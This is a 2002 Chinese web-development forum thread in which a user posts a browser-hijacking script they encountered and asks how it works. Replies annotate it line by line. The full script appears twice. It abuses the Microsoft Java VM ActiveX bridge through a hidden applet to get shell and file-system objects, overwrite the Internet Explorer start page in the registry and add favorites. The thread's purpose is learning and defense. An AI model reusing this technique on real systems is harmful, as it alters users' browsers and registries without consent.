高手帮我讲解一下js脚本病毒,我这里有一个简单的不能称为病毒的东东(学习)

summer419 2002-11-28 09:57:57
请教写文件的js应该怎么写,找到一个folder.htt还没有仔细看~~

版主或高手请帮我详细讲解,或者有什么地方有函数说明,书之类的最好,,我喜欢自己专研多过于求人,不过你们给大家讲解一下也好,大家也可以知道这种小脚本到底在我们的机器上做了什么,,以后遇到大脚本病毒了,呵呵,可以知道手工怎么解阿!

<SCRIPT>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
//这一段我不知道怎么用语言说,反正我不大懂,就是做一个activeX组件吧,但是js的实现过程只需要这样吗?com没有学什么,,可以说是用com注册一个吗?
斑竹教我!!
function AddFavLnk(loc, DispName, SiteURL)
{
var Shor = Shl.CreateShortcut(loc + "" + DispName +".URL");

//这个函数不懂不过看意思知道大概意思

Shor.TargetPath = SiteURL;
Shor.Save();
}
//end add favorites or links function
function f(){
try
{
//ActiveX initialization
a1=document.applets[0];//好奇怪的初始化,原理是什么?
a1.setCLSID(""); //com的注册id??是不是
a1.createInstance(); //创建实例?
Shl = a1.GetObject(); //获取这个对象?
a1.setCLSID(""); //是不是初始化一个可以多次使用?
a1.createInstance();
FSO = a1.GetObject(); //文件对象FSO,如果不用这个名字我也猜不出来,
a1.setCLSID("");
a1.createInstance();
Net = a1.GetObject(); //a1这个对象创建了3个实例,它累不累,
try
{
if (document.cookie.indexOf("Chg") == -1)
{
Shl.RegWrite ("HKCUSoftwareMicrosoftInternet ExplorerMainStart Page", "http://sqdj.k666.com/");

//写注册表,folder.htt用到的是写文件的函数,我忘记是什么了,:)
//folder.htt写了一段二进制,应该加过密的,,,不知道编码顺序
//有谁知道阿,我好想知道哦

var expdate = new Date((new Date()).getTime() + (1));
document.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
//end set home page
var expdate = new Date((new Date()).getTime() + (1));
document.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
//end Write Regedit
//add favorites this is the common part; should be here if you want to add favorites
var WF, Shor, loc;
WF = FSO.GetSpecialFolder(0);

//使用了FSO对象,不过不知道获取的是什么目录,是根目录吗?

loc = WF + "Favorites";
if(!FSO.FolderExists(loc))
{
loc = FSO.GetDriveName(WF) + "Documents and Settings" + Net.UserName + "Favorites"; //net.username这个用法,,蛮有意思,呵呵,,收藏
if(!FSO.FolderExists(loc))
{
return;
}
}
//end common part
//the following line is used for adding favorites.
//to add multiple favorites, duplicate the following line, changing the last 2 paramaters.
AddFavLnk(loc, "");
//end add favorites


}
}
catch(e)
{}
}
catch(e)
{}
}
function init()

//最无聊的是这里,我的机器被它搞的好慢,原来是这个死循环,搞的我莫明奇妙
//超级无聊,谁在写这种东西,要它去死,,虚假的运行,要是格我硬盘搞的我机器慢,我才服了他那,呵呵
{
setTimeout("f()", 1000);
}
init();
</SCRIPT>
...全文
89 5 打赏 收藏 转发到动态 举报
写回复
用AI写文章
5 条回复
切换为时间正序
请发表友善的回复…
发表回复
summer419 2002-11-29
  • 打赏
  • 举报
回复
哦。thanks
onestab(┼─) 我也是用的虚拟机,但是毒霸对这种代码也会抱病毒,,
我装的是xp,默认不支持java的consle,升级sp也升不了,就硬下了一个虚拟机,
applet一定是java吗?
zhouxhh 2002-11-28
  • 打赏
  • 举报
回复
<SCRIPT>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
//这一段我不知道怎么用语言说,反正我不大懂,就是做一个activeX组件吧,但是js的实现过程只需要这样吗?com没有学什么,,可以说是用com注册一个吗?
斑竹教我!!
////调用服务器端的java applet。"com.ms.activeX.ActiveXComponent"是微软java包中的一个java类
function AddFavLnk(loc, DispName, SiteURL)
{
var Shor = Shl.CreateShortcut(loc + "" + DispName +".URL");

//这个函数不懂不过看意思知道大概意思

Shor.TargetPath = SiteURL;
Shor.Save();
}
//end add favorites or links function
function f(){
try
{
//ActiveX initialization
a1=document.applets[0];//好奇怪的初始化,原理是什么? ////取文档中第一个applet对象-就是上面的那个。下面就开始创建这个类的实例
a1.setCLSID(""); //com的注册id??是不是
a1.createInstance(); //创建实例?
Shl = a1.GetObject(); //获取这个对象?
a1.setCLSID(""); //是不是初始化一个可以多次使用?
a1.createInstance();
FSO = a1.GetObject(); //文件对象FSO,如果不用这个名字我也猜不出来,
a1.setCLSID("");
a1.createInstance();
Net = a1.GetObject(); //a1这个对象创建了3个实例,它累不累,
try
{
if (document.cookie.indexOf("Chg") == -1)
{
Shl.RegWrite ("HKCUSoftwareMicrosoftInternet ExplorerMainStart Page", "http://sqdj.k666.com/");

//写注册表,folder.htt用到的是写文件的函数,我忘记是什么了,:)
//folder.htt写了一段二进制,应该加过密的,,,不知道编码顺序
//有谁知道阿,我好想知道哦

var expdate = new Date((new Date()).getTime() + (1));
document.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
//end set home page
var expdate = new Date((new Date()).getTime() + (1));
document.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
//end Write Regedit
//add favorites this is the common part; should be here if you want to add favorites
var WF, Shor, loc;
WF = FSO.GetSpecialFolder(0);

//使用了FSO对象,不过不知道获取的是什么目录,是根目录吗?////这是在服务器端指定的

loc = WF + "Favorites";
if(!FSO.FolderExists(loc))
{
loc = FSO.GetDriveName(WF) + "Documents and Settings" + Net.UserName + "Favorites"; //net.username这个用法,,蛮有意思,呵呵,,收藏
if(!FSO.FolderExists(loc))
{
return;
}
}
//end common part
//the following line is used for adding favorites.
//to add multiple favorites, duplicate the following line, changing the last 2 paramaters.
AddFavLnk(loc, "");
//end add favorites


}
}
catch(e)
{}
}
catch(e)
{}
}
function init()

//最无聊的是这里,我的机器被它搞的好慢,原来是这个死循环,搞的我莫明奇妙
//超级无聊,谁在写这种东西,要它去死,,虚假的运行,要是格我硬盘搞的我机器慢,我才服了他那,呵呵
{
setTimeout("f()", 1000);
}
init();
</SCRIPT>

////综上:这只是一个用java applet的一个小小的例子罢了。目的是把网站的路径强制加入到你的收藏夹中。
方工 2002-11-28
  • 打赏
  • 举报
回复
<SCRIPT>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
// MS的java 虚拟机的activeX部件,我的机器上使用sun的VM就没有这个漏洞了。
{
//ActiveX initialization
a1=document.applets[0];//引用刚才的java applet
a1.setCLSID(""); //设置activeX的注册id
a1.createInstance(); //创建实例?yes
Shl = a1.GetObject(); //获取这个对象?yes
a1.setCLSID(""); //是不是初始化一个可以多次使用?创建多个对象
a1.createInstance();
FSO = a1.GetObject(); //文件对象FSO,如果不用这个名字我也猜不出来,
a1.setCLSID("");
a1.createInstance();
Net = a1.GetObject(); //a1这个对象创建了3个实例,它累不累,
...
WF = FSO.GetSpecialFolder(0);

//使用FSO对象,获取window 目录
yonghengdizhen 2002-11-28
  • 打赏
  • 举报
回复
实际上得到了active x的运行权限,javascript基本上就可以做它想做的任何事了(喝喝,是不是太夸张了点,在winnt,win2k下它的权限仍然被限制在当前登录用户的权限范围内)
beyondbill 2002-11-28
  • 打赏
  • 举报
回复
有点意思,我也中过,不过是folder.htt文件多了一段加了密的代码,所以直接删了,也没研究过.

87,904

社区成员

发帖
与我相关
我的任务
社区描述
Web 开发 JavaScript
社区管理员
  • JavaScript
  • 无·法
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧